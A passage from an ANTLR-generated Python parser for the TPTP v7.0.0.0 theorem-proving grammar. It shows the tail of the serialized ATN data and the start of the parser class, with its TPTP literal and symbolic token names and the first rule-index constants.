buf.write("\u045c\u0458\3\2\2\2\u045d\u00c3\3\2\2\2\u045e\u045f\5")
buf.write("\u0108\u0085\2\u045f\u0460\7\16\2\2\u0460\u0461\5\u00c6")
buf.write("d\2\u0461\u0462\7\17\2\2\u0462\u0463\7\20\2\2\u0463\u0464")
buf.write("\5\u00c2b\2\u0464\u00c5\3\2\2\2\u0465\u046a\5\u0130\u0099")
buf.write("\2\u0466\u0467\7\4\2\2\u0467\u0469\5\u0130\u0099\2\u0468")
buf.write("\u0466\3\2\2\2\u0469\u046c\3\2\2\2\u046a\u0468\3\2\2\2")
buf.write("\u046a\u046b\3\2\2\2\u046b\u00c7\3\2\2\2\u046c\u046a\3")
buf.write("\2\2\2\u046d\u046e\5\u010e\u0088\2\u046e\u046f\5\u00c2")
buf.write("b\2\u046f\u0472\3\2\2\2\u0470\u0472\5\u00caf\2\u0471\u046d")
buf.write("\3\2\2\2\u0471\u0470\3\2\2\2\u0472\u00c9\3\2\2\2\u0473")
buf.write("\u0474\5\u00e4s\2\u0474\u0475\79\2\2\u0475\u0476\5\u00e4")
buf.write("s\2\u0476\u00cb\3\2\2\2\u0477\u047b\5\u00ceh\2\u0478\u047b")
buf.write("\5\u00d0i\2\u0479\u047b\5\u00d6l\2\u047a\u0477\3\2\2\2")
buf.write("\u047a\u0478\3\2\2\2\u047a\u0479\3\2\2\2\u047b\u00cd\3")
buf.write("\2\2\2\u047c\u047d\5\u00d8m\2\u047d\u00cf\3\2\2\2\u047e")
buf.write("\u0481\5\u00d2j\2\u047f\u0481\5\u00d4k\2\u0480\u047e\3")
buf.write("\2\2\2\u0480\u047f\3\2\2\2\u0481\u00d1\3\2\2\2\u0482\u0483")
buf.write("\5\u00dan\2\u0483\u00d3\3\2\2\2\u0484\u0485\5\u00e4s\2")
buf.write("\u0485\u0486\5\u0120\u0091\2\u0486\u0487\5\u00e4s\2\u0487")
buf.write("\u00d5\3\2\2\2\u0488\u0489\5\u00e0q\2\u0489\u00d7\3\2")
buf.write("\2\2\u048a\u0491\5\u0122\u0092\2\u048b\u048c\5\u0124\u0093")
buf.write("\2\u048c\u048d\7\f\2\2\u048d\u048e\5\u00e2r\2\u048e\u048f")
buf.write("\7\r\2\2\u048f\u0491\3\2\2\2\u0490\u048a\3\2\2\2\u0490")
buf.write("\u048b\3\2\2\2\u0491\u00d9\3\2\2\2\u0492\u0495\5\u012e")
buf.write("\u0098\2\u0493\u0495\5\u00dco\2\u0494\u0492\3\2\2\2\u0494")
buf.write("\u0493\3\2\2\2\u0495\u00db\3\2\2\2\u0496\u0497\5\u00de")
buf.write("p\2\u0497\u00dd\3\2\2\2\u0498\u049f\5\u012a\u0096\2\u0499")
buf.write("\u049a\5\u012c\u0097\2\u049a\u049b\7\f\2\2\u049b\u049c")
buf.write("\5\u00e2r\2\u049c\u049d\7\r\2\2\u049d\u049f\3\2\2\2\u049e")
buf.write("\u0498\3\2\2\2\u049e\u0499\3\2\2\2\u049f\u00df\3\2\2\2")
buf.write("\u04a0\u04a7\5\u0126\u0094\2\u04a1\u04a2\5\u0128\u0095")
buf.write("\2\u04a2\u04a3\7\f\2\2\u04a3\u04a4\5\u00e2r\2\u04a4\u04a5")
buf.write("\7\r\2\2\u04a5\u04a7\3\2\2\2\u04a6\u04a0\3\2\2\2\u04a6")
buf.write("\u04a1\3\2\2\2\u04a7\u00e1\3\2\2\2\u04a8\u04ad\5\u00e4")
buf.write("s\2\u04a9\u04aa\7\4\2\2\u04aa\u04ac\5\u00e4s\2\u04ab\u04a9")
buf.write("\3\2\2\2\u04ac\u04af\3\2\2\2\u04ad\u04ab\3\2\2\2\u04ad")
buf.write("\u04ae\3\2\2\2\u04ae\u00e3\3\2\2\2\u04af\u04ad\3\2\2\2")
buf.write("\u04b0\u04b6\5\u00e6t\2\u04b1\u04b6\5\u0130\u0099\2\u04b2")
buf.write("\u04b6\5\u00e8u\2\u04b3\u04b6\5\u00eav\2\u04b4\u04b6\5")
buf.write("\u00ecw\2\u04b5\u04b0\3\2\2\2\u04b5\u04b1\3\2\2\2\u04b5")
buf.write("\u04b2\3\2\2\2\u04b5\u04b3\3\2\2\2\u04b5\u04b4\3\2\2\2")
buf.write("\u04b6\u00e5\3\2\2\2\u04b7\u04bb\5\u00d8m\2\u04b8\u04bb")
buf.write("\5\u00dan\2\u04b9\u04bb\5\u00e0q\2\u04ba\u04b7\3\2\2\2")
buf.write("\u04ba\u04b8\3\2\2\2\u04ba\u04b9\3\2\2\2\u04bb\u00e7\3")
buf.write("\2\2\2\u04bc\u04bd\7\32\2\2\u04bd\u04be\5f\64\2\u04be")
buf.write("\u04bf\7\4\2\2\u04bf\u04c0\5\u00e4s\2\u04c0\u04c1\7\4")
buf.write("\2\2\u04c1\u04c2\5\u00e4s\2\u04c2\u04c3\7\r\2\2\u04c3")
buf.write("\u00e9\3\2\2\2\u04c4\u04c5\7\33\2\2\u04c5\u04c6\5\u008c")
buf.write("G\2\u04c6\u04c7\7\4\2\2\u04c7\u04c8\5\u00e4s\2\u04c8\u04c9")
buf.write("\7\r\2\2\u04c9\u04d1\3\2\2\2\u04ca\u04cb\7\34\2\2\u04cb")
buf.write("\u04cc\5\u0084C\2\u04cc\u04cd\7\4\2\2\u04cd\u04ce\5\u00e4")
buf.write("s\2\u04ce\u04cf\7\r\2\2\u04cf\u04d1\3\2\2\2\u04d0\u04c4")
buf.write("\3\2\2\2\u04d0\u04ca\3\2\2\2\u04d1\u00eb\3\2\2\2\u04d2")
buf.write("\u04d8\7\24\2\2\u04d3\u04d4\7\25\2\2\u04d4\u04d5\5\u00e2")
buf.write("r\2\u04d5\u04d6\7\26\2\2\u04d6\u04d8\3\2\2\2\u04d7\u04d2")
buf.write("\3\2\2\2\u04d7\u04d3\3\2\2\2\u04d8\u00ed\3\2\2\2\u04d9")
buf.write("\u04da\5\u00f0y\2\u04da\u04db\7K\2\2\u04db\u04dc\5\u00f0")
buf.write("y\2\u04dc\u04e2\3\2\2\2\u04dd\u04de\7\f\2\2\u04de\u04df")
buf.write("\5\u00eex\2\u04df\u04e0\7\r\2\2\u04e0\u04e2\3\2\2\2\u04e1")
buf.write("\u04d9\3\2\2\2\u04e1\u04dd\3\2\2\2\u04e2\u00ef\3\2\2\2")
buf.write("\u04e3\u04e9\7\23\2\2\u04e4\u04e5\7\16\2\2\u04e5\u04e6")
buf.write("\5\u00f2z\2\u04e6\u04e7\7\17\2\2\u04e7\u04e9\3\2\2\2\u04e8")
buf.write("\u04e3\3\2\2\2\u04e8\u04e4\3\2\2\2\u04e9\u00f1\3\2\2\2")
buf.write("\u04ea\u04ef\5\u00b6\\\2\u04eb\u04ec\7\4\2\2\u04ec\u04ee")
buf.write("\5\u00b6\\\2\u04ed\u04eb\3\2\2\2\u04ee\u04f1\3\2\2\2\u04ef")
buf.write("\u04ed\3\2\2\2\u04ef\u04f0\3\2\2\2\u04f0\u00f3\3\2\2\2")
buf.write("\u04f1\u04ef\3\2\2\2\u04f2\u04f8\5\u00f6|\2\u04f3\u04f4")
buf.write("\7\f\2\2\u04f4\u04f5\5\u00f6|\2\u04f5\u04f6\7\r\2\2\u04f6")
buf.write("\u04f8\3\2\2\2\u04f7\u04f2\3\2\2\2\u04f7\u04f3\3\2\2\2")
buf.write("\u04f8\u00f5\3\2\2\2\u04f9\u04fa\b|\1\2\u04fa\u04fb\5")
buf.write("\u00f8}\2\u04fb\u0501\3\2\2\2\u04fc\u04fd\f\3\2\2\u04fd")
buf.write("\u04fe\7.\2\2\u04fe\u0500\5\u00f8}\2\u04ff\u04fc\3\2\2")
buf.write("\2\u0500\u0503\3\2\2\2\u0501\u04ff\3\2\2\2\u0501\u0502")
buf.write("\3\2\2\2\u0502\u00f7\3\2\2\2\u0503\u0501\3\2\2\2\u0504")
buf.write("\u0509\5\u00ccg\2\u0505\u0506\7\66\2\2\u0506\u0509\5\u00cc")
buf.write("g\2\u0507\u0509\5\u00caf\2\u0508\u0504\3\2\2\2\u0508\u0505")
buf.write("\3\2\2\2\u0508\u0507\3\2\2\2\u0509\u00f9\3\2\2\2\u050a")
buf.write("\u050e\5\u0108\u0085\2\u050b\u050e\5\u00fc\177\2\u050c")
buf.write("\u050e\5\u00fe\u0080\2\u050d\u050a\3\2\2\2\u050d\u050b")
buf.write("\3\2\2\2\u050d\u050c\3\2\2\2\u050e\u00fb\3\2\2\2\u050f")
buf.write("\u0510\t\2\2\2\u0510\u00fd\3\2\2\2\u0511\u0512\t\3\2\2")
buf.write("\u0512\u00ff\3\2\2\2\u0513\u0518\7:\2\2\u0514\u0518\7")
buf.write("9\2\2\u0515\u0518\5\u010a\u0086\2\u0516\u0518\7F\2\2\u0517")
buf.write("\u0513\3\2\2\2\u0517\u0514\3\2\2\2\u0517\u0515\3\2\2\2")
buf.write("\u0517\u0516\3\2\2\2\u0518\u0101\3\2\2\2\u0519\u051c\5")
buf.write("\u010e\u0088\2\u051a\u051c\5\u0104\u0083\2\u051b\u0519")
buf.write("\3\2\2\2\u051b\u051a\3\2\2\2\u051c\u0103\3\2\2\2\u051d")
buf.write("\u051e\t\4\2\2\u051e\u0105\3\2\2\2\u051f\u0522\5\u010a")
buf.write("\u0086\2\u0520\u0522\7F\2\2\u0521\u051f\3\2\2\2\u0521")
buf.write("\u0520\3\2\2\2\u0522\u0107\3\2\2\2\u0523\u0524\t\5\2\2")
buf.write("\u0524\u0109\3\2\2\2\u0525\u0526\t\6\2\2\u0526\u010b\3")
buf.write("\2\2\2\u0527\u0528\t\7\2\2\u0528\u010d\3\2\2\2\u0529\u052a")
buf.write("\7\66\2\2\u052a\u010f\3\2\2\2\u052b\u052c\5\u0112\u008a")
buf.write("\2\u052c\u0111\3\2\2\2\u052d\u052e\5\u018a\u00c6\2\u052e")
buf.write("\u0113\3\2\2\2\u052f\u0530\7]\2\2\u0530\u0115\3\2\2\2")
buf.write("\u0531\u0532\5\u018e\u00c8\2\u0532\u0117\3\2\2\2\u0533")
buf.write("\u0536\5\u011a\u008e\2\u0534\u0536\5\u012a\u0096\2\u0535")
buf.write("\u0533\3\2\2\2\u0535\u0534\3\2\2\2\u0536\u0119\3\2\2\2")
buf.write("\u0537\u053a\5\u0122\u0092\2\u0538\u053a\5\u0126\u0094")
buf.write("\2\u0539\u0537\3\2\2\2\u0539\u0538\3\2\2\2\u053a\u011b")
buf.write("\3\2\2\2\u053b\u053c\7]\2\2\u053c\u011d\3\2\2\2\u053d")
buf.write("\u053e\7]\2\2\u053e\u011f\3\2\2\2\u053f\u0540\t\b\2\2")
buf.write("\u0540\u0121\3\2\2\2\u0541\u0542\5\u0124\u0093\2\u0542")
buf.write("\u0123\3\2\2\2\u0543\u0544\5\u018a\u00c6\2\u0544\u0125")
buf.write("\3\2\2\2\u0545\u0546\5\u0128\u0095\2\u0546\u0127\3\2\2")
buf.write("\2\u0547\u0548\5\u018e\u00c8\2\u0548\u0129\3\2\2\2\u0549")
buf.write("\u054a\5\u012c\u0097\2\u054a\u012b\3\2\2\2\u054b\u054c")
buf.write("\5\u018c\u00c7\2\u054c\u012d\3\2\2\2\u054d\u0550\5\u0190")
buf.write("\u00c9\2\u054e\u0550\7b\2\2\u054f\u054d\3\2\2\2\u054f")
buf.write("\u054e\3\2\2\2\u0550\u012f\3\2\2\2\u0551\u0552\7_\2\2")
buf.write("\u0552\u0131\3\2\2\2\u0553\u055c\5\u0136\u009c\2\u0554")
buf.write("\u055c\5\u0144\u00a3\2\u0555\u055c\5\u0148\u00a5\2\u0556")
buf.write("\u055c\7`\2\2\u0557\u0558\7\16\2\2\u0558\u0559\5\u0134")
buf.write("\u009b\2\u0559\u055a\7\17\2\2\u055a\u055c\3\2\2\2\u055b")
buf.write("\u0553\3\2\2\2\u055b\u0554\3\2\2\2\u055b\u0555\3\2\2\2")
buf.write("\u055b\u0556\3\2\2\2\u055b\u0557\3\2\2\2\u055c\u0133\3")
buf.write("\2\2\2\u055d\u0562\5\u0132\u009a\2\u055e\u055f\7\4\2\2")
buf.write("\u055f\u0561\5\u0132\u009a\2\u0560\u055e\3\2\2\2\u0561")
buf.write("\u0564\3\2\2\2\u0562\u0560\3\2\2\2\u0562\u0563\3\2\2\2")
buf.write("\u0563\u0135\3\2\2\2\u0564\u0562\3\2\2\2\u0565\u0568\5")
buf.write("\u0188\u00c5\2\u0566\u0568\5\u0138\u009d\2\u0567\u0565")
buf.write("\3\2\2\2\u0567\u0566\3\2\2\2\u0568\u0137\3\2\2\2\u0569")
buf.write("\u056a\7\35\2\2\u056a\u056b\5\u013a\u009e\2\u056b\u056c")
buf.write("\7\4\2\2\u056c\u056d\5\u0158\u00ad\2\u056d\u056e\7\4\2")
buf.write("\2\u056e\u056f\5\u013c\u009f\2\u056f\u0570\7\r\2\2\u0570")
buf.write("\u0139\3\2\2\2\u0571\u0572\5\u018a\u00c6\2\u0572\u013b")
buf.write("\3\2\2\2\u0573\u0579\7\23\2\2\u0574\u0575\7\16\2\2\u0575")
buf.write("\u0576\5\u013e\u00a0\2\u0576\u0577\7\17\2\2\u0577\u0579")
buf.write("\3\2\2\2\u0578\u0573\3\2\2\2\u0578\u0574\3\2\2\2\u0579")
buf.write("\u013d\3\2\2\2\u057a\u057f\5\u0140\u00a1\2\u057b\u057c")
buf.write("\7\4\2\2\u057c\u057e\5\u0140\u00a1\2\u057d\u057b\3\2\2")
buf.write("\2\u057e\u0581\3\2\2\2\u057f\u057d\3\2\2\2\u057f\u0580")
buf.write("\3\2\2\2\u0580\u013f\3\2\2\2\u0581\u057f\3\2\2\2\u0582")
buf.write("\u0584\5\u0132\u009a\2\u0583\u0585\5\u0142\u00a2\2\u0584")
buf.write("\u0583\3\2\2\2\u0584\u0585\3\2\2\2\u0585\u0141\3\2\2\2")
buf.write("\u0586\u0587\7\20\2\2\u0587\u0588\5\u0184\u00c3\2\u0588")
buf.write("\u0143\3\2\2\2\u0589\u058a\7\36\2\2\u058a\u058c\5\u0146")
buf.write("\u00a4\2\u058b\u058d\5\u0156\u00ac\2\u058c\u058b\3\2\2")
buf.write("\2\u058c\u058d\3\2\2\2\u058d\u058e\3\2\2\2\u058e\u058f")
buf.write("\7\r\2\2\u058f\u0145\3\2\2\2\u0590\u0591\7`\2\2\u0591")
buf.write("\u0147\3\2\2\2\u0592\u0596\5\u014a\u00a6\2\u0593\u0596")
buf.write("\5\u014e\u00a8\2\u0594\u0596\5\u0152\u00aa\2\u0595\u0592")
buf.write("\3\2\2\2\u0595\u0593\3\2\2\2\u0595\u0594\3\2\2\2\u0596")
buf.write("\u0149\3\2\2\2\u0597\u0598\7\37\2\2\u0598\u059a\5\u0192")
buf.write("\u00ca\2\u0599\u059b\5\u014c\u00a7\2\u059a\u0599\3\2\2")
buf.write("\2\u059a\u059b\3\2\2\2\u059b\u059c\3\2\2\2\u059c\u059d")
buf.write("\7\r\2\2\u059d\u014b\3\2\2\2\u059e\u059f\7\4\2\2\u059f")
buf.write("\u05a0\5\u0188\u00c5\2\u05a0\u014d\3\2\2\2\u05a1\u05a2")
buf.write("\7 \2\2\u05a2\u05a4\5\u0150\u00a9\2\u05a3\u05a5\5\u0156")
buf.write("\u00ac\2\u05a4\u05a3\3\2\2\2\u05a4\u05a5\3\2\2\2\u05a5")
buf.write("\u05a6\3\2\2\2\u05a6\u05a7\7\r\2\2\u05a7\u014f\3\2\2\2")
buf.write("\u05a8\u05a9\7`\2\2\u05a9\u0151\3\2\2\2\u05aa\u05ab\7")
buf.write("!\2\2\u05ab\u05ad\5\u0154\u00ab\2\u05ac\u05ae\5\u0156")
buf.write("\u00ac\2\u05ad\u05ac\3\2\2\2\u05ad\u05ae\3\2\2\2\u05ae")
buf.write("\u05af\3\2\2\2\u05af\u05b0\7\r\2\2\u05b0\u0153\3\2\2\2")
buf.write("\u05b1\u05b2\5\u018a\u00c6\2\u05b2\u0155\3\2\2\2\u05b3")
buf.write("\u05b4\7\4\2\2\u05b4\u05b5\5\u0158\u00ad\2\u05b5\u0157")
buf.write("\3\2\2\2\u05b6\u05bd\7\23\2\2\u05b7\u05b8\7\16\2\2\u05b8")
buf.write("\u05b9\5\u015a\u00ae\2\u05b9\u05ba\7\17\2\2\u05ba\u05bd")
buf.write("\3\2\2\2\u05bb\u05bd\5\u0184\u00c3\2\u05bc\u05b6\3\2\2")
buf.write("\2\u05bc\u05b7\3\2\2\2\u05bc\u05bb\3\2\2\2\u05bd\u0159")
buf.write("\3\2\2\2\u05be\u05c3\5\u015c\u00af\2\u05bf\u05c0\7\4\2")
buf.write("\2\u05c0\u05c2\5\u015c\u00af\2\u05c1\u05bf\3\2\2\2\u05c2")
buf.write("\u05c5\3\2\2\2\u05c3\u05c1\3\2\2\2\u05c3\u05c4\3\2\2\2")
buf.write("\u05c4\u015b\3\2\2\2\u05c5\u05c3\3\2\2\2\u05c6\u05ca\5")
buf.write("\u015e\u00b0\2\u05c7\u05ca\5\u0164\u00b3\2\u05c8\u05ca")
buf.write("\5\u0180\u00c1\2\u05c9\u05c6\3\2\2\2\u05c9\u05c7\3\2\2")
buf.write("\2\u05c9\u05c8\3\2\2\2\u05ca\u015d\3\2\2\2\u05cb\u05ce")
buf.write("\5\u0160\u00b1\2\u05cc\u05ce\5\u0162\u00b2\2\u05cd\u05cb")
buf.write("\3\2\2\2\u05cd\u05cc\3\2\2\2\u05ce\u015f\3\2\2\2\u05cf")
buf.write("\u05d0\7\"\2\2\u05d0\u05d1\5\u018a\u00c6\2\u05d1\u05d2")
buf.write("\7\r\2\2\u05d2\u0161\3\2\2\2\u05d3\u05d4\7#\2\2\u05d4")
buf.write("\u05d5\5\u018a\u00c6\2\u05d5\u05d6\7\r\2\2\u05d6\u0163")
buf.write("\3\2\2\2\u05d7\u05dc\5\u0166\u00b4\2\u05d8\u05dc\5\u016c")
buf.write("\u00b7\2\u05d9\u05dc\5\u0170\u00b9\2\u05da\u05dc\5\u016e")
buf.write("\u00b8\2\u05db\u05d7\3\2\2\2\u05db\u05d8\3\2\2\2\u05db")
buf.write("\u05d9\3\2\2\2\u05db\u05da\3\2\2\2\u05dc\u0165\3\2\2\2")
buf.write("\u05dd\u05de\7$\2\2\u05de\u05df\5\u0168\u00b5\2\u05df")
buf.write("\u05e0\7\r\2\2\u05e0\u05e3\3\2\2\2\u05e1\u05e3\5\u016a")
buf.write("\u00b6\2\u05e2\u05dd\3\2\2\2\u05e2\u05e1\3\2\2\2\u05e3")
buf.write("\u0167\3\2\2\2\u05e4\u05e5\7`\2\2\u05e5\u0169\3\2\2\2")
buf.write("\u05e6\u05e7\5\u013a\u009e\2\u05e7\u05e8\7\f\2\2\u05e8")
buf.write("\u05e9\5\u018a\u00c6\2\u05e9\u05ea\7\4\2\2\u05ea\u05eb")
buf.write("\5\u0184\u00c3\2\u05eb\u05ec\7\r\2\2\u05ec\u016b\3\2\2")
buf.write("\2\u05ed\u05ee\7%\2\2\u05ee\u05ef\7\16\2\2\u05ef\u05f0")
buf.write("\5\u017a\u00be\2\u05f0\u05f1\7\17\2\2\u05f1\u05f2\7\r")
buf.write("\2\2\u05f2\u016d\3\2\2\2\u05f3\u05f4\7&\2\2\u05f4\u05f5")
buf.write("\5\u014a\u00a6\2\u05f5\u05f6\7\r\2\2\u05f6\u016f\3\2\2")
buf.write("\2\u05f7\u05f8\7\'\2\2\u05f8\u05f9\5\u018a\u00c6\2\u05f9")
buf.write("\u05fa\7\4\2\2\u05fa\u05fb\7\16\2\2\u05fb\u05fc\5\u0172")
buf.write("\u00ba\2\u05fc\u05fd\7\17\2\2\u05fd\u05fe\7\r\2\2\u05fe")
buf.write("\u0171\3\2\2\2\u05ff\u0604\5\u0174\u00bb\2\u0600\u0601")
buf.write("\7\4\2\2\u0601\u0603\5\u0174\u00bb\2\u0602\u0600\3\2\2")
buf.write("\2\u0603\u0606\3\2\2\2\u0604\u0602\3\2\2\2\u0604\u0605")
buf.write("\3\2\2\2\u0605\u0173\3\2\2\2\u0606\u0604\3\2\2\2\u0607")
buf.write("\u060a\5\u0124\u0093\2\u0608\u060a\5\u0130\u0099\2\u0609")
buf.write("\u0607\3\2\2\2\u0609\u0608\3\2\2\2\u060a\u0175\3\2\2\2")
buf.write("\u060b\u060c\7(\2\2\u060c\u060e\5\u0192\u00ca\2\u060d")
buf.write("\u060f\5\u0178\u00bd\2\u060e\u060d\3\2\2\2\u060e\u060f")
buf.write("\3\2\2\2\u060f\u0610\3\2\2\2\u0610\u0611\7\5\2\2\u0611")
buf.write("\u0177\3\2\2\2\u0612\u0613\7\4\2\2\u0613\u0614\7\16\2")
buf.write("\2\u0614\u0615\5\u017a\u00be\2\u0615\u0616\7\17\2\2\u0616")
buf.write("\u0179\3\2\2\2\u0617\u061c\5\u0188\u00c5\2\u0618\u0619")
buf.write("\7\4\2\2\u0619\u061b\5\u0188\u00c5\2\u061a\u0618\3\2\2")
buf.write("\2\u061b\u061e\3\2\2\2\u061c\u061a\3\2\2\2\u061c\u061d")
buf.write("\3\2\2\2\u061d\u017b\3\2\2\2\u061e\u061c\3\2\2\2\u061f")
buf.write("\u0626\5\u017e\u00c0\2\u0620\u0621\5\u017e\u00c0\2\u0621")
buf.write("\u0622\7\20\2\2\u0622\u0623\5\u017c\u00bf\2\u0623\u0626")
buf.write("\3\2\2\2\u0624\u0626\5\u0184\u00c3\2\u0625\u061f\3\2\2")
buf.write("\2\u0625\u0620\3\2\2\2\u0625\u0624\3\2\2\2\u0626\u017d")
buf.write("\3\2\2\2\u0627\u062e\5\u018a\u00c6\2\u0628\u062e\5\u0180")
buf.write("\u00c1\2\u0629\u062e\5\u0130\u0099\2\u062a\u062e\5\u0190")
buf.write("\u00c9\2\u062b\u062e\7b\2\2\u062c\u062e\5\u0182\u00c2")
buf.write("\2\u062d\u0627\3\2\2\2\u062d\u0628\3\2\2\2\u062d\u0629")
buf.write("\3\2\2\2\u062d\u062a\3\2\2\2\u062d\u062b\3\2\2\2\u062d")
buf.write("\u062c\3\2\2\2\u062e\u017f\3\2\2\2\u062f\u0630\5\u018a")
buf.write("\u00c6\2\u0630\u0631\7\f\2\2\u0631\u0632\5\u0186\u00c4")
buf.write("\2\u0632\u0633\7\r\2\2\u0633\u0181\3\2\2\2\u0634\u0635")
buf.write("\7)\2\2\u0635\u0636\5\34\17\2\u0636\u0637\7\r\2\2\u0637")
buf.write("\u0649\3\2\2\2\u0638\u0639\7*\2\2\u0639\u063a\5d\63\2")
buf.write("\u063a\u063b\7\r\2\2\u063b\u0649\3\2\2\2\u063c\u063d\7")
buf.write("+\2\2\u063d\u063e\5\u00b4[\2\u063e\u063f\7\r\2\2\u063f")
buf.write("\u0649\3\2\2\2\u0640\u0641\7,\2\2\u0641\u0642\5\u00f4")
buf.write("{\2\u0642\u0643\7\r\2\2\u0643\u0649\3\2\2\2\u0644\u0645")
buf.write("\7-\2\2\u0645\u0646\5\u00e4s\2\u0646\u0647\7\r\2\2\u0647")
buf.write("\u0649\3\2\2\2\u0648\u0634\3\2\2\2\u0648\u0638\3\2\2\2")
buf.write("\u0648\u063c\3\2\2\2\u0648\u0640\3\2\2\2\u0648\u0644\3")
buf.write("\2\2\2\u0649\u0183\3\2\2\2\u064a\u0650\7\23\2\2\u064b")
buf.write("\u064c\7\16\2\2\u064c\u064d\5\u0186\u00c4\2\u064d\u064e")
buf.write("\7\17\2\2\u064e\u0650\3\2\2\2\u064f\u064a\3\2\2\2\u064f")
buf.write("\u064b\3\2\2\2\u0650\u0185\3\2\2\2\u0651\u0656\5\u017c")
buf.write("\u00bf\2\u0652\u0653\7\4\2\2\u0653\u0655\5\u017c\u00bf")
buf.write("\2\u0654\u0652\3\2\2\2\u0655\u0658\3\2\2\2\u0656\u0654")
buf.write("\3\2\2\2\u0656\u0657\3\2\2\2\u0657\u0187\3\2\2\2\u0658")
buf.write("\u0656\3\2\2\2\u0659\u065c\5\u018a\u00c6\2\u065a\u065c")
buf.write("\7R\2\2\u065b\u0659\3\2\2\2\u065b\u065a\3\2\2\2\u065c")
buf.write("\u0189\3\2\2\2\u065d\u065e\t\t\2\2\u065e\u018b\3\2\2\2")
buf.write("\u065f\u0660\7]\2\2\u0660\u018d\3\2\2\2\u0661\u0662\7")
buf.write("^\2\2\u0662\u018f\3\2\2\2\u0663\u0664\t\n\2\2\u0664\u0191")
buf.write("\3\2\2\2\u0665\u0666\7a\2\2\u0666\u0193\3\2\2\2\177\u0197")
buf.write("\u019e\u01a7\u01b0\u01bd\u01c8\u01d3\u01de\u01e9\u01f4")
buf.write("\u01fb\u0201\u0207\u020c\u0215\u0221\u022e\u023b\u0248")
buf.write("\u0258\u025d\u026c\u027e\u0283\u029e\u02a7\u02b0\u02ba")
buf.write("\u02c6\u02d3\u02de\u02ea\u02f1\u02f6\u02fd\u0302\u0306")
buf.write("\u030e\u031a\u0327\u0333\u0341\u0346\u0350\u0368\u036f")
buf.write("\u0376\u0381\u038b\u0392\u0399\u03a4\u03ae\u03b8\u03bf")
buf.write("\u03c6\u03d1\u03de\u03ec\u03f3\u03fd\u0404\u0415\u041a")
buf.write("\u041e\u0429\u042d\u0431\u0439\u0445\u0452\u045c\u046a")
buf.write("\u0471\u047a\u0480\u0490\u0494\u049e\u04a6\u04ad\u04b5")
buf.write("\u04ba\u04d0\u04d7\u04e1\u04e8\u04ef\u04f7\u0501\u0508")
buf.write("\u050d\u0517\u051b\u0521\u0535\u0539\u054f\u055b\u0562")
buf.write("\u0567\u0578\u057f\u0584\u058c\u0595\u059a\u05a4\u05ad")
buf.write("\u05bc\u05c3\u05c9\u05cd\u05db\u05e2\u0604\u0609\u060e")
buf.write("\u061c\u0625\u062d\u0648\u064f\u0656\u065b")
return buf.getvalue()
class tptp_v7_0_0_0Parser ( Parser ):
grammarFileName = "tptp_v7_0_0_0.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
literalNames = [ "<INVALID>", "'tpi('", "','", "').'", "'thf('", "'tfx('",
"'tff('", "'tcf('", "'fof('", "'cnf('", "'('", "')'",
"'['", "']'", "':'", "'$ite('", "'$let('", "'[]'",
"'{}'", "'{'", "'}'", "'$ite_f('", "'$let_tf('", "'$let_ff('",
"'$ite_t('", "'$let_ft('", "'$let_tt('", "'inference('",
"'introduced('", "'file('", "'theory('", "'creator('",
"'description('", "'iquote('", "'status('", "'assumptions('",
"'refutation('", "'new_symbols('", "'include('", "'$thf('",
"'$tff('", "'$fof('", "'$cnf('", "'$fot('", "'|'",
"'&'", "'<=>'", "'=>'", "'<='", "'<~>'", "'~|'", "'~&'",
"'~'", "'!!'", "'!>'", "'!='", "'='", "'!'", "'??'",
"'?*'", "'?'", "'^'", "'@@+'", "'@+'", "'@@-'", "'@-'",
"'@='", "'@'", "':='", "'>'", "'*'", "'+'", "'<<'",
"'-->'" ]
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"Or", "And", "Iff", "Impl", "If", "Niff", "Nor", "Nand",
"Not", "ForallComb", "TyForall", "Infix_inequality",
"Infix_equality", "Forall", "ExistsComb", "TyExists",
"Exists", "Lambda", "ChoiceComb", "Choice", "DescriptionComb",
"Description", "EqComb", "App", "Assignment", "Arrow",
"Star", "Plus", "Subtype_sign", "Gentzen_arrow", "Real",
"Signed_real", "Unsigned_real", "Rational", "Signed_rational",
"Unsigned_rational", "Integer", "Signed_integer",
"Unsigned_integer", "Decimal", "Positive_decimal",
"Decimal_exponent", "Decimal_fraction", "Dot_decimal",
"Exp_integer", "Signed_exp_integer", "Unsigned_exp_integer",
"Dollar_word", "Dollar_dollar_word", "Upper_word",
"Lower_word", "Single_quoted", "Distinct_object",
"WS", "Line_comment", "Block_comment" ]
RULE_tptp_file = 0
RULE_tptp_input = 1
RULE_annotated_formula = 2
RULE_tpi_annotated = 3
RULE_tpi_formula = 4
RULE_thf_annotated = 5
RULE_tfx_annotated = 6
RULE_tff_annotated = 7
RULE_tcf_annotated = 8
RULE_fof_annotated = 9
RULE_cnf_annotated = 10
RULE_annotations = 11
RULE_formula_role = 12
RULE_thf_formula = 13
RULE_thf_logic_formula = 14
RULE_thf_binary_formula = 15
RULE_thf_binary_pair = 16
RULE_thf_binary_tuple = 17
RULE_thf_or_formula = 18
RULE_thf_and_formula = 19
RULE_thf_apply_formula = 20
RULE_thf_unitary_formula = 21
RULE_thf_quantified_formula = 22
RULE_thf_quantification = 23
RULE_thf_variable_list = 24
RULE_thf_variable = 25
RULE_thf_typed_variable = 26
RULE_thf_unary_formula = 27
RULE_thf_atom = 28
RULE_thf_function = 29
RULE_thf_conn_term = 30
RULE_thf_conditional = 31
RULE_thf_let = 32
RULE_thf_arguments = 33
RULE_thf_type_formula = 34
RULE_thf_typeable_formula = 35
RULE_thf_subtype = 36
RULE_thf_top_level_type = 37
RULE_thf_unitary_type = 38
RULE_thf_apply_type = 39
RULE_thf_binary_type = 40
RULE_thf_mapping_type = 41
RULE_thf_xprod_type = 42
RULE_thf_union_type = 43
RULE_thf_sequent = 44
RULE_thf_tuple = 45
